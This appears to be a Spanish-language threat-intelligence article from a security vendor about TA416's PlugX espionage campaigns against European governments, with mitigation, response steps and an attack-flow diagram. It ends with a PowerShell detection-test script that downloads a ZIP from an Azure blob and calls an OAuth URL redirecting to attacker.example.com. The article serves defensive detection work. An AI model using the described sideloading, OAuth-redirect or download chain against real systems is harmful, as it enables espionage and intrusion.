Volvería corriendo a la UE: TA416 reanuda campañas de espionaje gubernamental europeo

Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime

Seguir

Volvería corriendo a la UE: TA416 reanuda campañas de espionaje gubernamental europeo

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

TA416, un actor de amenaza alineado con China, ha reiniciado la actividad dirigida a entidades gubernamentales y diplomáticas europeas a mediados de 2025 tras un período de actividad reducida. El actor combina el reconocimiento ligero basado en web-bug con la entrega de un backdoor PlugX personalizado, rotando cadenas de acceso inicial que incluyen señuelos falsos al estilo de Cloudflare Turnstile, abuso de redirección OAuth y descargadores impulsados por MSBuild. Para marzo de 2026, los informes indican que el mismo plan de acción se amplió a objetivos diplomáticos en Medio Oriente en medio de tensiones regionales crecientes ligadas a Irán. Las campañas se apoyan en buzones de correo comprometidos, binarios de Windows firmados para carga lateral de DLL y una infraestructura de comando y control de rápido cambio.

Investigación

Proofpoint rastreó múltiples oleadas de spear-phishing enviadas desde direcciones de correo libre y cuentas gubernamentales comprometidas, utilizando ya sea píxeles de seguimiento o archivos archivados armados. Las cadenas basadas en archivos usados utilizaron el contrabando de ZIP con artefactos LNK para preparar MSIs o paquetes TAR, que luego lanzaron ejecutables firmados para cargar lateralmente PlugX. Paralelamente, TA416 abusó de la redirección OAuth de Microsoft Entra ID y utilizó binarios renombrados de MSBuild emparejados con archivos de proyecto maliciosos en C# para recuperar y ejecutar cargas útiles. Se observó tráfico C2 sobre HTTP con mensajes encriptados con RC4 y patrones distintos de cabecera/cookie usados para moldear solicitudes y respuestas.

Mitigación

Implemente una autenticación de correo electrónico fuerte y endurezca los controles alrededor del contenido entrante procedente de proveedores de almacenamiento en la nube desconocidos. Monitoree la ejecución sospechosa de binarios firmados comúnmente abusados para carga lateral (por ejemplo, cnmpaui.exe y steam_monitor.exe) y alerte sobre comportamientos anormales en el orden de búsqueda de DLL. Agregue detecciones para firmas inusuales de cabeceras HTTP o cookies asociadas con C2 encriptado, y bloquee dominios/IPs conocidos de TA416 donde sea posible. Fortalezca el monitoreo de endpoints para la persistencia recién creada de entradas Run-key y escrituras de archivos inesperadas en directorios públicos o compartidos.

Respuesta

Si se detecta actividad, aísle el host, capture la memoria volátil y preserve los logs relevantes del endpoint y correo para el alcance. Busque artefactos de PlugX incluyendo el cargador CNCLID.dll, el shellcode Canon.dat y el mutex dGcEuQhKT. Revoque el acceso para cuentas de correo comprometidas, restablezca credenciales y elimine cualquier tarea programada u otros mecanismos de persistencia. Analice la telemetría de red para beaconing HTTP encriptado con RC4, luego bloquee dominios/URLs asociados y expanda la búsqueda a través del entorno.

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["Acción – T1566 Phishing: Correos electrónicos de phishing enviados desde cuentas comprometidas y phishing genérico. Los destinatarios hacen clic en enlaces maliciosos."] class action_initial_access action tool_phishing_email["Herramienta – Nombre: Correo electrónico de phishing Técnica: T1566"] class tool_phishing_email tool action_user_execution["Acción – T1204 Ejecución del usuario: Las víctimas hacen clic en una URL maliciosa que conduce a la descarga de un ZIP malicioso."] class action_user_execution action tool_malicious_zip["Herramienta – Nombre: Archivo ZIP malicioso que contiene un acceso directo LNK"] class tool_malicious_zip tool action_lnk_smuggling["Acción – T1027.012 Contrabando de Iconos LNK: El acceso directo LNK ejecuta un script de PowerShell."] class action_lnk_smuggling action process_powershell["Proceso – Ejecución de PowerShell para extraer binario firmado"] class process_powershell process tool_signed_binary["Herramienta – Nombre: cnmpaui.exe (binario legítimo firmado)"] class tool_signed_binary tool action_dll_sideloading["Acción – T1218 Ejecución de Proxy de Binario del Sistema: Carga lateral de DLL carga DLL maliciosa."] class action_dll_sideloading action malware_malicious_dll["Malware – DLL maliciosa cargada por carga lateral"] class malware_malicious_dll malware action_msbuild_execution["Acción – T1127.001 Ejecución de Utilidades de Desarrollador de Confianza Proxy: MSBuild utilizado para descargar y ejecutar PlugX."] class action_msbuild_execution action tool_msbuild["Herramienta – Nombre: Ejecutable de MSBuild renombrado"] class tool_msbuild tool tool_csharp_project["Herramienta – Nombre: Archivo de proyecto malicioso en C#"] class tool_csharp_project tool malware_plugx["Malware – Carga útil de PlugX"] class malware_plugx malware action_persistence["Acción – T1037.001 Persistencia mediante clave de registro Run y modificación de acceso directo."] class action_persistence action process_registry["Proceso – Creación de la clave de registro Run bajo HKCUSoftwareMicrosoftWindowsCurrentVersionRun"] class process_registry process action_defense_evasion["Acción – T1553.002 Subversión de Controles de Confianza: Abuso de ejecutables firmados y ofuscación pesada."] class action_defense_evasion action action_apddomain_hijack["Acción – T1574.014 Secuestro del Flujo de Ejecución: Secuestro de AppDomainManager vía cadena MSBuild"] class action_apddomain_hijack action action_c2["Acción – T1071.001 Protocolos Web y T1573.001 Canal Encriptado: HTTP C2 con encriptación RC4"] class action_c2 action process_c2_communication["Proceso – Comunicación HTTP encriptada con el servidor C2"] class process_c2_communication process action_exfiltration["Acción – T1041 Exfiltración Sobre Canal C2: Datos enviados sobre canal encriptado"] class action_exfiltration action %% Connections action_initial_access –>|entrega| tool_phishing_email tool_phishing_email –>|contiene enlace que lleva a| action_user_execution action_user_execution –>|descarga| tool_malicious_zip tool_malicious_zip –>|contiene| action_lnk_smuggling action_lnk_smuggling –>|ejecuta| process_powershell process_powershell –>|extrae| tool_signed_binary tool_signed_binary –>|carga| action_dll_sideloading action_dll_sideloading –>|carga| malware_malicious_dll malware_malicious_dll –>|prepara entorno para| action_msbuild_execution action_msbuild_execution –>|utiliza| tool_msbuild tool_msbuild –>|procesa| tool_csharp_project tool_csharp_project –>|descarga y ejecuta| malware_plugx malware_plugx –>|crea| action_persistence action_persistence –>|escribe| process_registry action_persistence –>|modifica acceso directo para| action_lnk_smuggling action_persistence –>|habilita| action_defense_evasion action_defense_evasion –>|aplica| action_apddomain_hijack action_apddomain_hijack –>|habilita| action_c2 action_c2 –>|comunica vía| process_c2_communication process_c2_communication –>|exfiltra datos vía| action_exfiltration "

Flujo de Ataque

Narrativa de Ataque y Comandos:
1. Preparar la carga útil: El atacante sube un archivo ZIP malicioso (payload.zip) al contenedor de Azure Blob mydownload.z29.web.core.windows.net.
2. Crear una página señuelo: Una página HTML maliciosa alojada en el mismo dominio incluye un <img> etiqueta que apunta a la URL de Azure Blob (desencadenando la descarga) and un <iframe> oculto que redirige inmediatamente a la víctima a un punto final de autorización OAuth 2.0 de Microsoft Entra ID con un redirect_uri apuntando al dominio controlado por el atacante.
3. Interacción de la víctima: La víctima visita la página señuelo (por ejemplo, a través de un correo electrónico de phishing). El navegador emite dos solicitudes HTTP GET en rápida sucesión: una para la URL de Blob y otra para la URL de OAuth. Los Registros de Actividad de Azure registran ambas solicitudes bajo la misma sesión proxy, satisfaciendo la condición de selección de selection_blob Y selection_oauth de la regla.

Script de Prueba de Regresión: (ejecutado desde la máquina de la víctima para reproducir la telemetría)

# Simulación de disparador de TA416 Azure Blob + OAuth
# Paso 1: Descargar blob malicioso (simulado con un archivo benigno)
Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"

# Paso 2: Inmediatamente invoca la URL de autorización OAuth (redirección simulada)
$oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null

Write-Host "Simulación completa – ambos URLs solicitados."

Comandos de Limpieza:

# Eliminar el archivo descargado
Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue

# Borrar variables de sesión de PowerShell
Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis